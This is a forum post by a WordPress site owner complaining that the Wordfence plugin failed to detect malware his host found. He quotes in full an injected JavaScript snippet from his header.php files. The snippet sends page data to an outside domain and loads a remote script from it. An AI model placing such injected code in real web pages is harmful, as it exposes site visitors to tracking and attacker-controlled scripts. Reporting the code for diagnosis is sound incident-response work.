Extremely Disappointed in WordFence…

So I purchased WordFence for all my sites, and earlier this week I got a notification from Hostgator that my account was suspended due to malware on my sites. I was baffled by this because I always keep all my core engines and plugins up to date, and also my sites are simply content-based without anything fancy on them. I ran a scan on WordFence on all sites, and it said everything was clean and no malware was found.

I contacted Hostgator again and their admin team confirmed there was definitely malware on the sites. I checked with Norton Security

So I had to go in the WP editor and look inside all files. I was finally ableto find out that some malicious code have been injected on ALL header.php files. Here is the malicious code:

<script>var a=”; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = “http://homefurniture-ltd.com/js/jquery.min.php&#8221;; var n_url = base + “?default_keyword=” + default_keyword + “&se_referrer=” + se_referrer + “&source=” + host; var f_url = base + “?c_utt=snt2014&c_utm=” + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== ” && se_referrer !== null && se_referrer !== ”){document.write(‘<script type=”text/javascript” src=”‘ + f_url + ‘”>’ + ‘<‘ + ‘/script>’);}</script>

I had to delete this code manually and now my sites are finally clean. My questions are simple:

1) Why wasn’t WordFence able to detect such easily noticeable malicious code?

2) Why did WordFence allow the code injection to happen in the first place? Shouldn’t it block foreign access to such core files? Or at least notify me about it?

3) Is WordFence going to be able to block these in the future, or should I look for another solution?

https://wordpress.org/plugins/wordfence/